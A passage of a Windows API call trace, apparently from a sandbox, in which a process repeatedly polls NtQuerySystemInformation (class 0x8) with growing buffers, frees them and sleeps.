RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0248.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0248.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0248.656] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0248.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0248.656] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0248.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.657] Sleep (dwMilliseconds=0x110) [0248.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0248.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0248.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0248.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0248.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0248.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0248.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0248.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0248.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.674] Sleep (dwMilliseconds=0x110) [0248.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0248.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0248.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0248.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0248.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0248.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0248.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0248.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0248.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.692] Sleep (dwMilliseconds=0x110) [0248.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0248.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0248.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0248.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0248.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0248.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0248.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0248.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0248.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.706] Sleep (dwMilliseconds=0x110) [0248.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0248.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0248.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0248.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0248.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0248.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0248.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0248.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0248.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.720] Sleep (dwMilliseconds=0x110) [0248.731] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0248.731] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0248.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0248.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0248.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0248.738] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0248.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0248.739] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0248.739] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.739] Sleep (dwMilliseconds=0x110) [0248.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0248.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0248.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0248.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0248.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0248.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0248.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0248.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0248.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.754] Sleep (dwMilliseconds=0x110) [0248.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0248.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0248.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0248.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0248.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0248.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0248.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0248.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0248.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.769] Sleep (dwMilliseconds=0x110) [0248.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0248.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0248.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0248.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0248.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0248.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0248.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0248.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0248.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.785] Sleep (dwMilliseconds=0x110) [0248.794] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0248.794] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.794] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0248.794] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0248.794] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0248.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0248.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0248.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0248.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0248.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.796] Sleep (dwMilliseconds=0x110) [0248.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0248.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0248.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0248.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0248.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0248.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0248.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0248.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0248.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.816] Sleep (dwMilliseconds=0x110) [0248.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0248.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0248.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0248.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0248.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0248.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0248.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0248.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0248.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.829] Sleep (dwMilliseconds=0x110) [0248.841] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0248.841] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.842] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0248.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0248.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.842] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0248.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0248.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0248.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0248.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0248.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.843] Sleep (dwMilliseconds=0x110) [0248.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0248.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0248.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0248.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0248.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0248.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0248.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0248.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0248.864] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.864] Sleep (dwMilliseconds=0x110) [0248.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0248.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, 